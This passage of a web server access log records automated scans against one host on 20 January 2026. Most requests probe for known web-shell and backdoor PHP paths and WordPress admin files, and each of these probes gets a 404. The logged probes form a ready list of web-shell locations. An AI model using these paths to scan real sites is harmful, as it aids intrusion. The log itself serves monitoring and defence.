Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:12:44:15 +0000] 404 - GET http 91.82.83.208 "/form.html" [Client 134.122.73.241] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" +[20/Jan/2026:12:44:15 +0000] 404 - GET http 91.82.83.208 "/upl.php" [Client 134.122.73.241] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[20/Jan/2026:12:44:15 +0000] 404 - GET http 91.82.83.208 "/t4" [Client 134.122.73.241] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[20/Jan/2026:12:44:15 +0000] 404 - GET http 91.82.83.208 "/geoip/" [Client 134.122.73.241] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:12:44:15 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:12:44:16 +0000] 404 - GET http 91.82.83.208 "/1.php" [Client 134.122.73.241] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:12:44:16 +0000] 404 - GET http 91.82.83.208 "/systembc/password.php" [Client 134.122.73.241] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:12:44:16 +0000] 404 - GET http 91.82.83.208 "/password.php" [Client 134.122.73.241] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[20/Jan/2026:12:45:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.227.18.98] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" +[20/Jan/2026:12:45:07 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 64.227.18.98] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" +[20/Jan/2026:12:52:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:12:55:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:12:57:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class-t.api.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/zwso.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/css/colors/blue/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class19.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class20.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/randkeyword.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fwe.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/images/m.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/g.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tx1.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xv.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/x56.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/htaccess.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/readme.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/x50.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fv.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file.php?" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lsd.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/as.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wsd.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gtc.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/atx.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/z60.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/403.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/m.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/themes.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/maint/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/network/wp-conflg.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/click.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/install.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lv.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/simple.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/css.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cong.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/images/wp-login.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cong.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/w.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/404.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ioxi-o.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0x.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/css.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/222.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/maint/maint.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/classwithtostring.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/abcd.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/autoload_classmap.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inputs.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/alfa.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/themes/twentytwentytwo/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/js/wp-conflg.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/wp-conflg.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:22 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/css/wp-conflg.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:22 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/manager.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:22 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/item.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:22 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/plugins/Cache/footer.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/404.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mail.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sx.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/maint/admin.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/alfa.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/1.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/byp.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-trackback.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/.well-known/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/network/plugins.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gmo.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:26 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/ID3/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:26 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/css/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:26 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/SimplePie/wp-login.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:26 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/themes/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:27 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/filemanager/dialog.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:27 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/maint/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:27 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/customize/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:27 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/index/function.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/uploads/autoload_classmap.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/style-engine/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ww1.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/about/function.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin/function.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/.well-known/acme-challenge/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/css/colors/blue/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/security.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/user/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/js/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/upgrade/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/assets/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/radio.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/fonts/index.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/.well-known/admin.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/admin.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/admin.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/themes/twentytwentytwo/index.php?p=" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/.well-known/log.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless5.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/js/codemirror/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/block-patterns/index.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lock360.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/f35.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ioxi-o1.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/juuuu.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ha.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gg.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/we2.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/04.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/333.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/520.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ar.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/x.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xx.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gifclass4.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/2clas.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ave.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wrt.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bibil.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/radio.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/files.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file7.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gifclass.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/css/colors/midnight/about.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nox.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file48.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/info.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class9.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/la.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless11.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ccou.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ton.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/403.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file9.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ac.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/new4.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pop.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/az.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xaz.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/up4.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/1aa.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/elp.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:43 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wtz.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:43 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/galex.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:43 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xb.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:43 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ova.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:44 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/vx.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:12:57:44 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rh.php" [Client 40.83.96.65] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:13:00:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.227.254.155] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:01:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 